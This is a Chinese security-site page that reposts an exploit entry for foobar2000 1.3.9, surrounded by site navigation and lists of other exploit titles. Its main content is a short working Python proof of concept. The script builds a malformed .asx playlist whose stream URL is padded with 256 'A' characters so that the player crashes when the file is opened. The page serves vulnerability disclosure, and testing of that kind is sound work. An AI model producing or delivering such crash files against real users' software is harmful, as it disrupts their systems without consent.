首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
foobar2000 1.3.9 - (.asx) Local Crash PoC
来源:vfocus.net 作者:Antonio Z. 发布时间:2015-11-17  
# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
 
# Instructions: Create playlist.asx:
# <asx version="3.0">
#   <title>Example.com Live Stream</title>
#
#   <entry>
#     <title>Short Announcement to Play Before Main Stream</title>
#     <ref href="http://example.com/announcement.wma" />
#     <param name="aParameterName" value="aParameterValue" />
#   </entry>
#
#   <entry>
#     <title>Example radio</title>
#     <ref href="http://example.com" />
#     <author>Example.com</author>
#     <copyright>example.com</copyright>
#   </entry>
# </asx>
 
import os
import shutil
 
evil = 'A' * 256
 
shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')
 
file = open('Local_Crash_PoC.asx','r')
file_data = file.read()
file.close()
file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
file = open('Local_Crash_PoC.asx','w')
file.write(file_new_data)
file.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XCart 5.2.6 - Code Execution V
·TECO SG2 LAD Client 3.51 SEH O
·ClipperCMS 1.3.0 - Code Execut
·TECO JN5 L510-DriveLink 1.482
·Idera Up.Time Monitoring Stati
·Free WMA MP3 Converter 1.8 Buf
·Idera Up.Time Monitoring Stati
·WordPress Users Ultra 1.5.50 U
·vBulletin 5.1.2 Unserialize Co
·vBulletin 5.x - Remote Code Ex
·Sam Spade 1.14 - S-Lang Comman
·Audacious 3.7 - ID3 Local Cras
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved